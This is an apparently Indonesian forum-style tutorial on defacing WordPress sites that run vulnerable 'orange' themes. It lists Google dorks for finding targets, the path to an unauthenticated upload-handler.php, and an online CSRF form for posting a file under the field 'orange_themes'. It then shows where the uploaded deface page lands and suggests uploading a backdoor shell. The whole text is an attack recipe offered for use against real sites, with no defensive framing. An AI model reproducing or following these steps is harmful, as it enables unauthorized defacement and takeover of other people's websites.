assalamualikum mamank...

kali ini saya mau ngeshare cara deface dengan wordpress orange theme

vulnreability:upload with crsf


lanjut ke langkah-langkahnya:

-kopi dan rokok
-kuota yang banyakk
yang paling terpenting
-DORKKKKKKK yang freshhhhh(use your brain)
-scrip deface/shell backdoor
Shell Backdoor disini

di sini saya akan mengajarkan dengan ekstensi HTML :


Dork:
-inurl:"/wp-content/themes/rockstar-theme/"

-inurl:"/wp-content/themes/karnel-theme/"

kembangin lagii yah mamank biar dapet yang fresh :v

exploit:
-/wp-content/themes/rockstar-theme/functions/upload-handler.php

/wp-content/themes/karnel-theme/functions/upload-handler.php

langkah-langkah

1.pertama dork di google lalu pilih web yang vuln

2.sekarang tambahkan exploit di belakang
contoh:http://www.site.co.li/wp-content/themes/rockstar-theme/functions/upload-handler.php


jika error seperti gambar yang di atas berarti web nya vuln


terus selanjutnya apa ? yah tidur lah :v awokawoka kaga lucu :v

3.terus buka crsf online : https://earthseed.space/csrf.php


terus postfilenya dengan orange_themes


4.sekarang udah terupload :v
 terus gimna cara manggil script nya ?

tambahkan exploit:/wp-content/uploads/[tahun]/[bulan]/namascript.html



tambahan:kalian bisa upshell di webnya,kalo web itu support

cukup sekian tutorial dari saya :)